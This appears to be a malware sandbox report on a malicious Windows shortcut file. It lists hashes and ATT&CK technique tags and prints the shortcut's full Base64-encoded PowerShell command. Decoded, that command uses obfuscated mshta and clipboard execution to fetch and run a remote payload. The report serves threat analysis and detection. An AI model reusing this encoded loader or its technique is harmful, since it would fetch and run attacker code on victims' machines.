Malicious
Malicious

8d78c893822e5b176b828b7a86ad11dd

LNK File
|
MD5: 8d78c893822e5b176b828b7a86ad11dd
|
Size: 3.32 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules2
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
8d78c893822e5b176b828b7a86ad11dd
Sha1
7db70859572c3d76df989e97238ecd5ca93c1c3b
Sha256
4a061fd8f386dcc579f97e6e57437f132c1a2d7f177c3c99de5dc6f0f789b772
Sha384
6464b627762a1c28414862aceb0c104cb16b74fe062fcdd1e68d91bc065b43f017f939893a7c37bb6159fc8f0dc22686
Sha512
aeff36706c1796b6f23b1b50add3c7993782bef9667ab5e341d96ca0ef158354e1ff83670df37f91313ea9b4e87203dc7c5597ea38de21b6876de52398960c47
SSDeep
24:8Ayw/BHYVKVWO+/CWFO0uvk7LeHQpCHXC/TMVa3vnuzJm0sHCEJMdd79dsHqThOr:8y5apTGk7LZY3C/QU3vyJUiuMdJ91Ir
TLSH
676142280AF601FEFA73D6B997F976F34866FBC38C3595BC108067424722500B463A7A
File Structure
8d78c893822e5b176b828b7a86ad11dd
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAG0AcwBoAF4AdABhAF4AXgBeAF4AIABeAF4AXgBoAF4AXgB0AF4AXgBeAHQAXgBeAHAAcwBeAF4AOgBeAF4ALwAvAF4AXgBeAHcAXgBeAHcAdwBeAF4AXgAuADQAXgBeAHMAXgB5AF4AXgBeAF4AbgBjAC4AYwBeAF4AbwBeAF4AbQBeAC8AXgBeAF4AXgB3AF4AXgBeAGUAYgAvAF4AXgBkAF4AaQByAGUAXgBeAF4AYwB0AEQAXgBvAHcAXgBeAF4AXgBuAF4AXgBsAF4AbwBhAGQAXgBeAF4AXgAvAHAAXgBeAF4AUABYAGQAXgBeAF4AawB1AEcAXgBeAF4AZQAvAF4AbABqAFcAXgBeAGoAXgBGAEwAXgAwAHMAXgAuADAAXgBeAF4AXgA1AF4AOQBeAF4AZAA5AF4AXgBeAF4AZQBeAF4AXgBeAGMANABeADMAXgBeADcAXgBeAF4AXgBiAF4AXgBeAF4AZAA1AF4AXgBeAGIAYQBeAF4AOABhAF4AXgBeADQAXgBeAF4AXgBkAF4AXgA3AF4ANABiAF4AXgBeAF4AYwBeAF4AYgBeAF4AXgBeAGUAXgBeAF4AZgAwAGYAXgBiAF4AXgBeAF4AMABeAF4AXgBeAGMANQBeAF4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAG0AcwBoAF4AdABhAF4AXgBeAF4AIABeAF4AXgBoAF4AXgB0AF4AXgBeAHQAXgBeAHAAcwBeAF4AOgBeAF4ALwAvAF4AXgBeAHcAXgBeAHcAdwBeAF4AXgAuADQAXgBeAHMAXgB5AF4AXgBeAF4AbgBjAC4AYwBeAF4AbwBeAF4AbQBeAC8AXgBeAF4AXgB3AF4AXgBeAGUAYgAvAF4AXgBkAF4AaQByAGUAXgBeAF4AYwB0AEQAXgBvAHcAXgBeAF4AXgBuAF4AXgBsAF4AbwBhAGQAXgBeAF4AXgAvAHAAXgBeAF4AUABYAGQAXgBeAF4AawB1AEcAXgBeAF4AZQAvAF4AbABqAFcAXgBeAGoAXgBGAEwAXgAwAHMAXgAuADAAXgBeAF4AXgA1AF4AOQBeAF4AZAA5AF4AXgBeAF4AZQBeAF4AXgBeAGMANABeADMAXgBeADcAXgBeAF4AXgBiAF4AXgBeAF4AZAA1AF4AXgBeAGIAYQBeAF4AOABhAF4AXgBeADQAXgBeAF4AXgBkAF4AXgA3AF4ANABiAF4AXgBeAF4AYwBeAF4AYgBeAF4AXgBeAGUAXgBeAF4AZgAwAGYAXgBiAF4AXgBeAF4AMABeAF4AXgBeAGMANQBeAF4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA"
8d78c893822e5b176b828b7a86ad11dd (3.32 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙